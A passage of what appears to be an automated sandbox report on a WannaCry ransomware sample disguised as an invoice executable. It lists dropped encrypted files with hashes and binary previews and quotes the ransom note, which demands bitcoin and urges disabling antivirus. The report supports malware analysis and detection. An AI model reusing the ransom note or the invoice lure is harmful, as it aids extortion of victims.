                                                          Preview:WANACRY!........=...Z.q./.G.ziS.....s.~...S.nr.6.z.6#.m.....I....=S6.Q6.:LL..O_;pr...J....&..)*~......_.c..e...>F..rl.3-.PZ.P.#..}...!J.U....#l|................(V....F.q.4u.H. K....K...)...f/xb...8aY.?.s.|.'@.<QT...p2Q...1......UT.o3....h)..q7.:....*.Pq....t............7o..h...).h....a.."D...M#..80$..P3....S....'.*.z..@v^.G@...#@.V.KY;j...-1..2.F...a@.C...8..iMI)xWJ.T.1M*tU./]...$!..r..t.[.+.n>.H.<:...$.w%A.....`.7.....[..U...%ME....3..(.nk..!7...Di.......^.9S|......Q..[J:,6........s#Z....N..2.....-.4.....|...c.+...6...}W.8...3...+......X.xw...12.*({.,.hb.k.*.~k.iy.....6..T.e.v...-...S....!\.!/..P.jRU._s.P..$"<.G...."X...V....T......'.....%..&.p...^..g...g`o..f.r.6.*...q%~;..Q...p...~o..B.oA3.H/.{<..w_.`OvN......+.q..l8.>.;P.:?....;......tBqeU>+_..L.....&..Idw.=...t-..f..*. t.D.x..,C."....6..C..g-G3..=.y.I.:t....J/...|.%..&.....9...SP...../.. m.]..bl.=...8.x.....g%(f.>...M[...$8.......,.....".\...'.L.....-..)...}.0.Cb....3tx.N.un...>.t..1K..Ba.

                                                          C:\Users\user\Desktop\HMPPSXQPQV.xlsx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.85180929987057
                                                          Encrypted:false
                                                          SSDEEP:24:bkbkA+aj5OQndftQMXm1JTcrKacGbIw2zWE62Mf26dhf6SrdRFsd59Fy:bkjj5ZVtPqkKx1w9E6Lf9p6SX259Q
                                                          MD5:35C43C2F7BF042D9619F74F0577388E3
                                                          SHA1:2A93CB0E0C16995181BF446B22B18533A5400290
                                                          SHA-256:30C32DE0621904187610F86234ABA18BBA95E73DA6C52774AC70C7F98AC1C357
                                                          SHA-512:993DD47705A728EBB00F518C8A01290A01F714625488E883E245BDF97BC0A31203D423EB1BA47495FDEB40B16CC7703E344FEDB6E8961FF0847B8E235ECBD2DB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........=...Z.q./.G.ziS.....s.~...S.nr.6.z.6#.m.....I....=S6.Q6.:LL..O_;pr...J....&..)*~......_.c..e...>F..rl.3-.PZ.P.#..}...!J.U....#l|................(V....F.q.4u.H. K....K...)...f/xb...8aY.?.s.|.'@.<QT...p2Q...1......UT.o3....h)..q7.:....*.Pq....t............7o..h...).h....a.."D...M#..80$..P3....S....'.*.z..@v^.G@...#@.V.KY;j...-1..2.F...a@.C...8..iMI)xWJ.T.1M*tU./]...$!..r..t.[.+.n>.H.<:...$.w%A.....`.7.....[..U...%ME....3..(.nk..!7...Di.......^.9S|......Q..[J:,6........s#Z....N..2.....-.4.....|...c.+...6...}W.8...3...+......X.xw...12.*({.,.hb.k.*.~k.iy.....6..T.e.v...-...S....!\.!/..P.jRU._s.P..$"<.G...."X...V....T......'.....%..&.p...^..g...g`o..f.r.6.*...q%~;..Q...p...~o..B.oA3.H/.{<..w_.`OvN......+.q..l8.>.;P.:?....;......tBqeU>+_..L.....&..Idw.=...t-..f..*. t.D.x..,C."....6..C..g-G3..=.y.I.:t....J/...|.%..&.....9...SP...../.. m.]..bl.=...8.x.....g%(f.>...M[...$8.......,.....".\...'.L.....-..)...}.0.Cb....3tx.N.un...>.t..1K..Ba.

                                                          C:\Users\user\Desktop\HMPPSXQPQV\@Please_Read_Me@.txt

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):933
                                                          Entropy (8bit):4.711824502619554
                                                          Encrypted:false
                                                          SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                          MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                          SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                          SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                          SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                          C:\Users\user\Desktop\HMPPSXQPQV\@WanaDecryptor@.exe.lnk

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jan 16 09:59:27 2024, mtime=Tue Jan 16 09:59:27 2024, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                          Category:dropped
                                                          Size (bytes):575
                                                          Entropy (8bit):5.140087190146179
                                                          Encrypted:false
                                                          SSDEEP:12:8p9lRXpzYNbBmxCV9nRDTUobjAcIeooldJOdJAmV:8NYfJ/ZAcdDJYJAm
                                                          MD5:B260B5F1DA21A21030CF78AD377BA719
                                                          SHA1:AAF3ED1310E06DDA913464C27E844D68FB0B5E0D
                                                          SHA-256:14F95E9431CBBB8518EAA828AE01EDFE5E464C305DFB319E551AFDA47217E348
                                                          SHA-512:D9E2D44C383ADF16F20D2E704C4D2755F109E84D12E628B1C0A1C288BE5A8E8A0F69AA0A1A372932A240BFA001EB3EB0B82A8BDAE66E720F29E02C93281B6258
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.... ...V...kH..d?..kH...X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........{4...%g..kH...k..kH....t.2......J.. .@WANAD~1.EXE..X......0XnW0XnW....S.........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......X...............-.......W............/.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......927537...........hT..CrF.f4... ...0.+d...,....%..hT..CrF.f4... ...0.+d...,....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                          C:\Users\user\Desktop\HMPPSXQPQV\HMPPSXQPQV.docx

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.819830313222283
                                                          Encrypted:false
                                                          SSDEEP:24:hXrzChXy1JEa87SM3c3/MYTKXU5ND76NS3l9V+otGTA:ZzkyzEa8NA/MYT4UTDumlyNA
                                                          MD5:4C5F0273FCF4974C14CAA192D7A67DAB
                                                          SHA1:4DF71BE2A19322B1C89F83F96E99164BCC66B1F6
                                                          SHA-256:235DDAB663344AA6AB024E9BADB1F5C23FB1562CE68AFF0040BE8A59813AEE4A
                                                          SHA-512:3A74E06CB4CA1EA8FE08ECDCCB4FF64983993FD8C41288E15A73CC04136E74224443FC113035A6F6F73FAB1FA7C1B225CF40B2800495FB9A35E7F108A9230F62
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:?.@..}....Q`U.A....3Ak3.9...N.....}".".?(Y{.I..H..../1E.Dp.{.%.....K...\....>.L...j.S>9unD0........F.......Q._7.ms,.:.[.:l.....0.......N.D......h1..>..`..Z.5..L.].~.J.z&.v....R..H. g........G.P.D.e5.l....T......m..v.......=.z`=.B..P....`...]...s5.0.;M..ye.x.&.o6.y...l6`......J....m.....osT..s.......k...=..y...h`K..R$!{L.T}9.k#/c.....'.1LS...#.....$.<..b...;..6......$.................^UQ....:..._-..}D.W$........?.:Ir|vh......!.e...KW.....Ks.............9.%..>.a.%6]..Q.Jj0....H0_.....^.8...1'~..^.`Z.sj..B.....7c..O....1.J..V...L.....,....(.Dr.|..A..;.......LA....S.h....c.:...8.a.s..)......N..I:..8....f....c......^..OV.....4%c].!j........M.6.QR....Vf0....s..F....g.V.O...<..l.k.g5F,.`..|.g.7&.F._..8..4....IQ.8....S.r.....DaIj...I.2...1.....Iy.......<.....#..Z.,Z..f.....R/.-v'\....2..q..uQ..ZQ..N..+.f.'.;... C..c=...K.3...ik.}.DE..|81D..,.6A......GX....c...0..|G.x.E..+.{.h.;j.P.....Y.%..D..Gy...~.#..o)..."..B..m&...q^4.....Ht..4..^.

                                                          C:\Users\user\Desktop\HMPPSXQPQV\HMPPSXQPQV.docx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.848097317455926
                                                          Encrypted:false
                                                          SSDEEP:24:bkj6jNSLt0LiXDGZ8Murmxrk81P64fR9B2I9nmHR6qkfrHkAItYX:bkGjNSL1yyMkwb5TnA69kAItYX
                                                          MD5:3F6BE896E850808CFB2A9E4C6B96C14E
                                                          SHA1:301842A6EBC6A1185EA68F8F5F74CC29E688CB42
                                                          SHA-256:3FC13832B2220E7A884EBF777DF0104B719A4F79602DC7B52E68D73ED3140979
                                                          SHA-512:DD117E3C6FDA766F50F155BD7A5C1FEDEA3B38872E8FB84AE068F58B524C539982B967339572689BE9987F9584C98B2FC0D5E9DDE62D76579C928E589513BD92
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....i#v.A..[m...;..4.`..H...=..cl...w.,.M.....o0..'....XO...H.|`.....Lq..A@.'f..x.G..Av.....)..p...9.."..mrC@.....a}....Vl..lE.9+u.P..t.......?D..1_G~.d.......Nv.s..N.m....N.w.P..\m.[..:....\..Se.*PE.Y.<..}....2o.Ob...m.....Y|...8C3.p.d..8.............(.....E.0.F.>..gP..%.!.q.$........97..h.`.GO....d.I.l..j..Ju..s.....Y.3......i<o....91]^...6....D.o?..i7.....:.{..lr..@.~C.........f..o...N^...I.5....Jn..#.V.gv.....[i........[..V..P.......M.....sf.V.}......:.O..G..0.c|...Q.?.E.E.(r...y.(.^.V...<j.>....d.!..4 .............:z.-..DX!.. ..b.tN/...e..zEA|.x.........,.d..~.=..L1%.(.J.2..2;6.ON.o...&)I.;.m..Ogx.rF.W.#.|X..^..f!.g;8IaL9..R.ZW..7...{.2..<.+d...T....>.....8.K*..ZB....d.|...d1<..J....a$..x..N...s..............P.+.....9L......s...."....Y...G...m5o.6...5...l.. .....H....'v.\.d..o;..,.`..B[...8...O...<..?.......Z...............t.K@...3.l........1...7...=........~...*..D......3......S...=...KE=.!..N.....Q..e $S.b.TT.k..

                                                          C:\Users\user\Desktop\HMPPSXQPQV\HMPPSXQPQV.docx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.848097317455926
                                                          Encrypted:false
                                                          SSDEEP:24:bkj6jNSLt0LiXDGZ8Murmxrk81P64fR9B2I9nmHR6qkfrHkAItYX:bkGjNSL1yyMkwb5TnA69kAItYX
                                                          MD5:3F6BE896E850808CFB2A9E4C6B96C14E
                                                          SHA1:301842A6EBC6A1185EA68F8F5F74CC29E688CB42
                                                          SHA-256:3FC13832B2220E7A884EBF777DF0104B719A4F79602DC7B52E68D73ED3140979
                                                          SHA-512:DD117E3C6FDA766F50F155BD7A5C1FEDEA3B38872E8FB84AE068F58B524C539982B967339572689BE9987F9584C98B2FC0D5E9DDE62D76579C928E589513BD92
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....i#v.A..[m...;..4.`..H...=..cl...w.,.M.....o0..'....XO...H.|`.....Lq..A@.'f..x.G..Av.....)..p...9.."..mrC@.....a}....Vl..lE.9+u.P..t.......?D..1_G~.d.......Nv.s..N.m....N.w.P..\m.[..:....\..Se.*PE.Y.<..}....2o.Ob...m.....Y|...8C3.p.d..8.............(.....E.0.F.>..gP..%.!.q.$........97..h.`.GO....d.I.l..j..Ju..s.....Y.3......i<o....91]^...6....D.o?..i7.....:.{..lr..@.~C.........f..o...N^...I.5....Jn..#.V.gv.....[i........[..V..P.......M.....sf.V.}......:.O..G..0.c|...Q.?.E.E.(r...y.(.^.V...<j.>....d.!..4 .............:z.-..DX!.. ..b.tN/...e..zEA|.x.........,.d..~.=..L1%.(.J.2..2;6.ON.o...&)I.;.m..Ogx.rF.W.#.|X..^..f!.g;8IaL9..R.ZW..7...{.2..<.+d...T....>.....8.K*..ZB....d.|...d1<..J....a$..x..N...s..............P.+.....9L......s...."....Y...G...m5o.6...5...l.. .....H....'v.\.d..o;..,.`..B[...8...O...<..?.......Z...............t.K@...3.l........1...7...=........~...*..D......3......S...=...KE=.!..N.....Q..e $S.b.TT.k..

                                                          C:\Users\user\Desktop\HMPPSXQPQV\HQJBRDYKDE.jpg

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.80993583322359
                                                          Encrypted:false
                                                          SSDEEP:24:L++YW151wAaAbUd1XAXJmaKTDljSjzVo1H9vUgwTJcvuUGTdL:L+glwBaCsJcljRdBwTivuUGB
                                                          MD5:3D4CD4E842FC9F0B9C985F9DD1701FE4
                                                          SHA1:0631435AA989C2CA129261458CEB739098A1B4C0
                                                          SHA-256:ED8BF86F6F545E1DC0DBAA3D34C23395AAB8F02A83221FFAE0B5AD8D06D8AA40
                                                          SHA-512:60DB3B619EC5560F37F74EECCAFC54EE0E6A1B2BD0729409E5C375A5A7B53EF1A258BA1D59BE471133FEA40A9D11A079F612520173FD9B9F42DE06A47C84D59B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.......9+l9.eXk..:&..w]....Y.h.>'Y~.......H..(VI..p%..`4...../.1'.@...GpY ,.+Q%;6@.8.G..aad..(.6.K.$....d..9...F=p.r..........,.......T*< .+.jH......~..+.:.....'AX......a....f.;....0.sJ..l..Zp.!Z..>+........|..l......:.+...z.....Z....V.z......%.pR..u.e.Mt$*No..C..0"...n...{5G.B...$._ /.]`.>...z....$.T.......V......PN+....3......Y....[.......m..C.jq..H...T..n.S.7Q...g....m...W..Q.x...G...*U.LG......`5..<.P.EC}....0....fA.K....L......yL.;.d."p\.w.A.G.S.....^.$.._}..S..Ev../.m..n.k.apMyG.I..z...UV..|!.!..N.....j..W..A@.tpw...Y..... ...6...e.P.0.vB.Xa.(.nI.Y..e5..<s...e.?.r...f.e/a*O.H|.....9Bq..F..........d..ni..hg..1U..G....Z=.......e*.0D.\I..C.............$J.......?'N..............\V.v.mBPM9vk"...Rkk%.j?q.5:..O.HQ.B.R......@..'.)|.n....o...v..D..g...13g.QKN".o.Ym..|.8.^..S.zwO.``...G6.m4.."q........2@..x....y.3.......5....AB..2..?".rO..|..R..O.@?..[..~..Lp..T<...$>..]YO-..h.(.'..W..U8.&.9..{C.]#T..TY;.Z...Mf...2........0.R..$..

                                                          C:\Users\user\Desktop\HMPPSXQPQV\HQJBRDYKDE.jpg.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.841698618407332
                                                          Encrypted:false
                                                          SSDEEP:24:bkig5Y39eRAUNZxVL2lTb0cJvXTN4jnWI2cuyKlXiBhKokD+Nds8VmHjHXSVgc9r:bkiga3mnxVLUb0cJPB4jV2cutijXNds4
                                                          MD5:71AE585CEDC6BD4947CABE4E039E0F53
                                                          SHA1:4F164E5FAF761076070E409712D8D83DB1F34284
                                                          SHA-256:30AF169B1434E9513FF7FC285C17D8A9DAC5E6AD5AD3E4234527D51BF177FC8E
                                                          SHA-512:0004A3137F4F39C0DD66EC3624F5751DBF285C10BFD91BC74D187AF8020E66D1947586F903A44AEBE423A82DE03056C5E904F00D1608BD265C28B00780B5D1CF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....+.Th....%.^..>.5b.Dh.`..S.....S:........[.........P.[.w./..|*K?...)K..%}vCM..>A.)...]....%.......j....J..o.YagE.8..1...W..P_..9..p;>".2..c...}"..tB......! ..YS.n..f....a..$.)@6.ou.5.h.*../J....*T.<h..\Q.8.q..P.$2.Er.O....X.r....'.M...n!h..-..SI..............yFv.....X.^.f5t/.....Q........l.S.F......!Y......4|..g?..l....S..6.sM..lq...X..w..^=o...x..dd..,.]..D.yd....P....vWn........tU..R6..+..cP.t......|....0]E..=(.(O6..HO.....$If|l.b..B.6....K..I..d. ..+'......_....Y. r...p..~...:|.....BS[...U........A..n ..g.U...sIO9A...+l....z..VvvoZ[br.t~.<.%....T.~.J.>qz..{...<wB..f<..<)f..!.jFv...V....o.te8..#..;.C.3..M..)......l0..X2U.j]....S.w2.'n.b.HO._.na..A.M...n8..a.$$t....r.w.U..}.D>..d5;.a.a+..IQiq.]YJ..6..L.v.%.n4.8...o.....4..W..i......N....T.*...G..J*.Y._Usg.>......#9z@.y.....C.."g...3..`4...+......Pqz.y.e.z./..[..H$..a./e..j.r.F.O......7...~..v......l..v.&CDD'....6..n# ")ja....v......>....m5....11..H...s...(^_..W..{k.....7a..5.0.s..

                                                          C:\Users\user\Desktop\HMPPSXQPQV\HQJBRDYKDE.jpg.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.841698618407332
                                                          Encrypted:false
                                                          SSDEEP:24:bkig5Y39eRAUNZxVL2lTb0cJvXTN4jnWI2cuyKlXiBhKokD+Nds8VmHjHXSVgc9r:bkiga3mnxVLUb0cJPB4jV2cutijXNds4
                                                          MD5:71AE585CEDC6BD4947CABE4E039E0F53
                                                          SHA1:4F164E5FAF761076070E409712D8D83DB1F34284
                                                          SHA-256:30AF169B1434E9513FF7FC285C17D8A9DAC5E6AD5AD3E4234527D51BF177FC8E
                                                          SHA-512:0004A3137F4F39C0DD66EC3624F5751DBF285C10BFD91BC74D187AF8020E66D1947586F903A44AEBE423A82DE03056C5E904F00D1608BD265C28B00780B5D1CF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....+.Th....%.^..>.5b.Dh.`..S.....S:........[.........P.[.w./..|*K?...)K..%}vCM..>A.)...]....%.......j....J..o.YagE.8..1...W..P_..9..p;>".2..c...}"..tB......! ..YS.n..f....a..$.)@6.ou.5.h.*../J....*T.<h..\Q.8.q..P.$2.Er.O....X.r....'.M...n!h..-..SI..............yFv.....X.^.f5t/.....Q........l.S.F......!Y......4|..g?..l....S..6.sM..lq...X..w..^=o...x..dd..,.]..D.yd....P....vWn........tU..R6..+..cP.t......|....0]E..=(.(O6..HO.....$If|l.b..B.6....K..I..d. ..+'......_....Y. r...p..~...:|.....BS[...U........A..n ..g.U...sIO9A...+l....z..VvvoZ[br.t~.<.%....T.~.J.>qz..{...<wB..f<..<)f..!.jFv...V....o.te8..#..;.C.3..M..)......l0..X2U.j]....S.w2.'n.b.HO._.na..A.M...n8..a.$$t....r.w.U..}.D>..d5;.a.a+..IQiq.]YJ..6..L.v.%.n4.8...o.....4..W..i......N....T.*...G..J*.Y._Usg.>......#9z@.y.....C.."g...3..`4...+......Pqz.y.e.z./..[..H$..a./e..j.r.F.O......7...~..v......l..v.&CDD'....6..n# ")ja....v......>....m5....11..H...s...(^_..W..{k.....7a..5.0.s..

                                                          C:\Users\user\Desktop\HMPPSXQPQV\LHEPQPGEWF.png

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.800194796026652
                                                          Encrypted:false
                                                          SSDEEP:24:htgX1RXNeSakqjsdappBUR+5C/4nU8esUGkgVLYH:htgX1RXNeSakqBv5JU8lJkgVLYH
                                                          MD5:1129E048FC35FFE9B7B870571728DC81
                                                          SHA1:0373BABB82E142474693B06AD6905C51A10DE886
                                                          SHA-256:2E67065A23B2FC2714D8068559AC9B7534D4F3AA241EF1E00FCDE859D4951BEB
                                                          SHA-512:F73846F0019B360743070439C196B86438121581777E36EBA44033CCC63B12C1E7B13367E56AE26E2323F66540797AB6285E7F609E094326CDCB50831B51D4C3
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:o......bx.`..r..C*./<N.?.'.ZJ.Y.......3.c.;............?......4...2..6<cM.2,...t.bM........H}..].|..gVt..!M.L.kA.7l(..Ti.x....=.p...&.zsY.}."m1.LQ...8.d.qb.Z^..Q17..V!..nH?....|=.Y.t.G&._Lf.WVK.'SD...\..2...._1z...ZNJ&.Q........b.<.h.b...h.*...S.m;....f...7y.7.\..R....#l.!.i...^..P.....+AG...I.f.9...E.s.....$...;i..[.[-@..E.......U..*,J.u..j.w9.lw.....^..'.M...~.5..c.......`..m{.Em.9.Y<?+.....m..;..]....>e.$B..m.Td.I:...._.~",6.)....d;...wj.R.ZM6Z.W]*.X.....r...r.",b.....*.I....Ha3.B b.5..n.2m_[..F..=-c...7~]...`...T.......:0.W.G..{...U.....K.]..2e....i...^...}%.f..OMilX*.E.8*.g....`..m.J..p.].}.n|....VtE.?./...U..x..;..9.1..]...u.|F..Q..m....;R..:..c....}m..Y.!.0...n.|...k.3.Z...?#.n.+...c..-%.I...^O.B....F$.<...x7ek."1'.AV.A..?W..z..t..*....L.R[..$yB..s;?........~..t.....^....2...$h..*......w.3e.S.l....9...!...F7..z.`.b..|.....Ma.%..n...x0...+.Jh.._2<.".no<.....A.....?!r..].tk=].....O.w.m..{.u.pv$...U.....7...e.&.HU.G.?H...6cF...rv.T

                                                          C:\Users\user\Desktop\HMPPSXQPQV\LHEPQPGEWF.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.834608565146905
                                                          Encrypted:false
                                                          SSDEEP:24:bkWVJCJA/4uBTKnONRbHt9NY5VV/7EnPVqz8BcCWfbIilflwJDondB3jOl:bkWVYK5mKjvNYJEnPVaY8VflwJMel
                                                          MD5:095A788ABE8F4DC8981D2B712FE6FC8E
                                                          SHA1:141C8DDBAD7F7FB45C63C3167D8E122BB1232439
                                                          SHA-256:5D109E1632BBA4B9984916E24DA7355C8136D5077FE605E0F6C096F53BDA6767
                                                          SHA-512:C5F5A60DF348A33F5CB92A9ADEF78C8F0D4A5BFC1BCC1D1513EBAF6CBAF6AE6C01A19A5FF520C41AAC03B798418EEEC89C4194D24208E4E2F850CE186617A627
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...../v .}....mI4C.l)#.~.A....].....vT..:.......w.".zhK.r.).#"..+..*..=....nPy..0..."]......G.S.>$..\q.|n..Y.!..U+"<4|...}$..5..H.>.=..t=.*e..Je..{...m............}..S..7@...T.../.NX....l<H...V\.=..V.6...:.\..k5..AN......Q.......HD.cgG1a.n.......#..................$9..A....Tn..|"f.#...!Y......}.....$...2.?..O=..xv...k..19..:..m..Y.m.mP....x....6..i..e......Bc".3....V.....#7..s..5..r.E..\.W>.z..1q ...7..`....w2.L.tY.."..9..W..,I...N.y....3.......N.O3....q.F&rn.S6..........{...pX.B..Ng...L.M@.....bO<.......e:./..el ....l.#.h..!.....q..s..`....{.+...M....H%n...RNX.Z{.EQ.......I.....v,2:.g.]..u.UKp........*.m.#F..Nh..V5.uSZ#.....\...X.......V.%e...M.a.O..Soi{I.w.[[...`...o.,......f*.1{.:.`.J...I..}5.1V,.8.J....^.$WW......C.ix....J.....Mvp8'.).L._;..].........|7B&.DSpu.....2F.....U.5......J.....D.*.db.@....j.)...^,..*........v.?...#..E8.X...........Ah.1PPTA. .....6/%..S..g.1k.......2..-.p.Q~.....^}?.m..B......IGv.e.~..=L........J.

                                                          C:\Users\user\Desktop\HMPPSXQPQV\LHEPQPGEWF.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.834608565146905
                                                          Encrypted:false
                                                          SSDEEP:24:bkWVJCJA/4uBTKnONRbHt9NY5VV/7EnPVqz8BcCWfbIilflwJDondB3jOl:bkWVYK5mKjvNYJEnPVaY8VflwJMel
                                                          MD5:095A788ABE8F4DC8981D2B712FE6FC8E
                                                          SHA1:141C8DDBAD7F7FB45C63C3167D8E122BB1232439
                                                          SHA-256:5D109E1632BBA4B9984916E24DA7355C8136D5077FE605E0F6C096F53BDA6767
                                                          SHA-512:C5F5A60DF348A33F5CB92A9ADEF78C8F0D4A5BFC1BCC1D1513EBAF6CBAF6AE6C01A19A5FF520C41AAC03B798418EEEC89C4194D24208E4E2F850CE186617A627
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...../v .}....mI4C.l)#.~.A....].....vT..:.......w.".zhK.r.).#"..+..*..=....nPy..0..."]......G.S.>$..\q.|n..Y.!..U+"<4|...}$..5..H.>.=..t=.*e..Je..{...m............}..S..7@...T.../.NX....l<H...V\.=..V.6...:.\..k5..AN......Q.......HD.cgG1a.n.......#..................$9..A....Tn..|"f.#...!Y......}.....$...2.?..O=..xv...k..19..:..m..Y.m.mP....x....6..i..e......Bc".3....V.....#7..s..5..r.E..\.W>.z..1q ...7..`....w2.L.tY.."..9..W..,I...N.y....3.......N.O3....q.F&rn.S6..........{...pX.B..Ng...L.M@.....bO<.......e:./..el ....l.#.h..!.....q..s..`....{.+...M....H%n...RNX.Z{.EQ.......I.....v,2:.g.]..u.UKp........*.m.#F..Nh..V5.uSZ#.....\...X.......V.%e...M.a.O..Soi{I.w.[[...`...o.,......f*.1{.:.`.J...I..}5.1V,.8.J....^.$WW......C.ix....J.....Mvp8'.).L._;..].........|7B&.DSpu.....2F.....U.5......J.....D.*.db.@....j.)...^,..*........v.?...#..E8.X...........Ah.1PPTA. .....6/%..S..g.1k.......2..-.p.Q~.....^}?.m..B......IGv.e.~..=L........J.

                                                          C:\Users\user\Desktop\HMPPSXQPQV\NIRMEKAMZH.mp3

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:OpenPGP Secret Key
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.818747812713695
                                                          Encrypted:false
                                                          SSDEEP:24:kE1qtfuYLsiyw6xccbFGf+EXMd4jMyMmyDR+ynG:ahLnIcM9EcywyMm2+yG
                                                          MD5:87A3289919D902E00991C3BBDC02D52E
                                                          SHA1:89AA89FD74E33D7CD16930BA8AF7DEAD6C442BCB
                                                          SHA-256:FACCBD7C756879525B9748926A7249DC2AC0B36C8E07E26980038DD43C74B36F
                                                          SHA-512:87639FC69461EDEA45E7DA8D4D43CDC05BC9CCBF996AC5BF6116F348D9259214EB245BA379B7E0F558B17FB4A80EE2A788D8C19ACAFFDC4B4182B35095D64AAB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.N.Ue.9qW.rA ..MK...&.......6.k.N....`T....9!.........;......`O.....nv].'\..X..8..m............R.....S.I...--....8....$1.}.D......B....(MQ.m:.*HK..ZH.V.5YV....5.p-csp.....th.D..a\>...A.F.T....t..tM....S.^v#V..>/./.P..k...O..G.A..N.....?|........L..3..x...........f}<..H...V.&.s;F..Jp...^5$.~.S.05w;...P.bp.I~...8...3s...`.k..........3..N.8...]?...!wz....;..4.....B...z.H...H.....B..V..GH....M..'...+."sS'z...^$^.A+!.z..49L...5-{..1...3...i...{.'.$..7.'...4).._..$.....W...*...B.......?......;i%.....Nd#f.$..*"h..{6..[_..gZ..<.@...I..........<0..Q....\.....E..~L.1....%`0..TI../.-u......I.I.....}.a.W.&.lX...f..v..B.>c.TP.c..O.K....#.g.U`ov....5...".9./`.....Bp.ow....\.....W.QL...H.n-.)...9..n.s.x0._o<....-.O<...V..GD} 1.........0.O..Ss.?K........z..$6..x..'`........w[.3Q..Z..1....A.....I.*...m.....G..Qg...f.'...].|.q....e...Q.....>.... ......n)(./]..2.S.^m.% .Z..'.sB.D~.%o.+.Ab...:.%X.w@=..t[...F..9.=....}.@.R,%..|..{....|H.

                                                          C:\Users\user\Desktop\HMPPSXQPQV\NIRMEKAMZH.mp3.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.842046283415181
